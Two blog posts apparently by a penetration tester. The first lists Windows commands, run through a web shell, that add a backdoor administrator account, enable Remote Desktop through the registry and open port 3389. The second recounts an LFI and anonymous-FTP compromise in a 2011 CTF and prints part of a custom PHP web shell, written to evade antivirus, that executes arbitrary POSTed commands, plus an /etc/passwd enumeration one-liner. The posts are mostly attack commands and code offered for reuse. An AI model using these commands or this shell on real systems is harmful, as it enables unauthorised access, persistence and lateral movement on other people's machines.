Enable RDP via Command line

Been extremely busy with loads of work. Anyways, here’s something interesting that I needed to do recently at a customer network to gain access to a server.

I managed to obtain a web application shell to the server and was able to execute commands as Administrator. The Application was running of XAMPP under an administrative accounts, so I was lucky there. But what I needed was GUI access to the desktop because I wanted to compromise another server which was reachable using a custom programmed application running on the server that I had just gained access to. Here’s what I did:

1. Created a user and added it to the local administrators group using these commands:

net user newadmin newpa$$w0rd /add

net localgroup administrators newadmin /add
net user newadmin

2. Used the following commands to enable Remote Desktop and logged in with my credentials:

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server"

/v fDenyTSConnections /t REG_DWORD /d 0 /f

netsh firewall set portopening TCP 3389

3. Bit off a large chunk of some awesome tasting chicken sandwich, sipped some coffee and then proceeded with the rest of the Penetration Test.

Lot of Penetration Testers, reach this wall at some point during their assessments. Hope this helps some tired soul like me.

Happy Hacking!

Simple PHP Web Application Backdoor

The Hack In the Box CTF PreQuals 2011 had hackers from all over the world rack their brains against a Windows Binary and a Web Application. The challenge was to submit the MD5 sum of a flag either from the binary or from the application server. Somewhere between the night of March 19th and the early morning of March 20th, a group of hackers from India managed to crack the Web Application challenge.

The web application in question was vulnerable to a Local File Inclusion vulnerability. The web server also had its FTP port open and permitted anonymous login and file upload. It was then a matter of time when people who found this started uploading web application shells which would then be called from the application’s home page. A simple Google search will give tons of shells that would allow attackers to do awesome amounts of stuff at the mere click of buttons. Prebuilt commands into the page allow attackers to search for files that are world readable, open reverse connect shells, bind ports to /bin/bash, upload and download files etc. But most of these shells are detected by antivirus software and are flagged malicious. Since I needed a simple execution interface, I decided to write a shell from scratch. Here’s the code:

simple php shell PoC - karniv0re

System Info

echo "/etc/issue:\t".exec ("cat /etc/issue")."\n";
echo "uname -a:\t".exec ("uname -a")."\n";
echo "id:\t\t".exec("id")."\n";
echo "current wd:\t".exec ("pwd")."\n";

Command Output

$cmd = $_POST['cmd'];
if (strlen($cmd)==0){
$cmd = "true";

To get a list of users once you have uploaded and gained access to your shell, you can run:

"awk -F ":" '{ print $1 "[" $3 "]" "[" $7 "]"}' /etc/passwd"

Feel free to modify and add features, but remember there are more shells out there doing much more awesome stuff than merely execute and display.

Happy Hacking!